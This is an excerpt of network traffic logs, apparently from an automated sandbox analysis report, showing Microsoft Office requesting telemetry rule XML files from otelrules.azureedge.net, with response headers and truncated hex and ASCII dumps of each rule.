                                                                                                                                            2024-10-31 16:13:14 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120676" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120675" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            88192.168.2.44984513.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:14 UTC192OUTGET /rules/rule120678v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:14 UTC470INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:14 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 468
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                            ETag: "0x8DC582BBA642BF4"
                                                                                                                                            x-ms-request-id: af2b1dc9-001e-0066-0d6c-27561e000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161314Z-16849878b78hh85qc40uyr8sc800000009zg00000000nbt5
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:14 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120678" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            89192.168.2.44984613.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:14 UTC192OUTGET /rules/rule120679v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:14 UTC491INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:14 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 174
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                                                                            ETag: "0x8DC582B91D80E15"
                                                                                                                                            x-ms-request-id: 2034bdf9-701e-003e-3056-2679b3000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161314Z-16849878b78z2wx67pvzz63kdg00000008bg00000000ffyb
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:14 UTC174INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 37 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120679" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120677" /> </S> <T> <S T="1" /> </T></R>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            90192.168.2.44984713.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:14 UTC192OUTGET /rules/rule120680v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:14 UTC563INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:14 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1952
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                                                                                            ETag: "0x8DC582B956B0F3D"
                                                                                                                                            x-ms-request-id: 09711dcd-d01e-0066-4b94-2aea17000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161314Z-17c5cb586f672xmrz843mf85fn00000008t0000000004kx0
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:14 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            91192.168.2.44984813.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:14 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:14 UTC491INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:14 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 958
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                                                            ETag: "0x8DC582BA0A31B3B"
                                                                                                                                            x-ms-request-id: 080ba15e-001e-0082-732b-275880000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161314Z-16849878b78qg9mlz11wgn0wcc00000009c0000000009ueq
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:14 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            92192.168.2.44984913.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:14 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:14 UTC491INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:14 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 501
                                                                                                                                            Connection: close
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                                                            ETag: "0x8DC582BACFDAACD"
                                                                                                                                            x-ms-request-id: 45a27b82-c01e-002b-5784-2a6e00000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161314Z-159b85dff8flqhxthC1DFWsvrs00000001s0000000007an1
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:14 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            93192.168.2.44985013.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:15 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:15 UTC563INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:15 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 2592
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                            ETag: "0x8DC582BB5B890DB"
                                                                                                                                            x-ms-request-id: 335320d3-001e-000b-4596-2a15a7000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161315Z-16849878b78z2wx67pvzz63kdg00000008bg00000000ffyy
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:15 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            94192.168.2.44985213.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:15 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:15 UTC584INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:15 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 2284
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                                            ETag: "0x8DC582BCD58BEEE"
                                                                                                                                            x-ms-request-id: fb8efb24-701e-0050-0ba3-266767000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161315Z-16849878b78fhxrnedubv5byks000000082g00000000f8gv
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:15 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            95192.168.2.44985113.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:15 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:15 UTC563INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:15 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 3342
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                                                            ETag: "0x8DC582B927E47E9"
                                                                                                                                            x-ms-request-id: 41937e91-c01e-008e-5d57-277381000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161315Z-16849878b78g2m84h2v9sta29000000008s00000000046t6
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:15 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            96192.168.2.44985313.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:15 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:15 UTC563INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:15 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1393
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                                            ETag: "0x8DC582BE3E55B6E"
                                                                                                                                            x-ms-request-id: 97090380-701e-0032-52b4-2aa540000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161315Z-16849878b78qwx7pmw9x5fub1c0000000800000000001d4c
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                            2024-10-31 16:13:15 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            97192.168.2.44985413.107.246.43443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-10-31 16:13:15 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                            2024-10-31 16:13:15 UTC584INHTTP/1.1 200 OK
                                                                                                                                            Date: Thu, 31 Oct 2024 16:13:15 GMT
                                                                                                                                            Content-Type: text/xml
                                                                                                                                            Content-Length: 1356
                                                                                                                                            Connection: close
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                            ETag: "0x8DC582BDC681E17"
                                                                                                                                            x-ms-request-id: 19a18c92-701e-0098-0fb0-26395f000000
                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                            x-azure-ref: 20241031T161315Z-16849878b78zqkvcwgr6h55x9n000000093g00000000thar
                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                            X-Cache-Info: L1_T2
                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                            Accept-Ranges: bytes
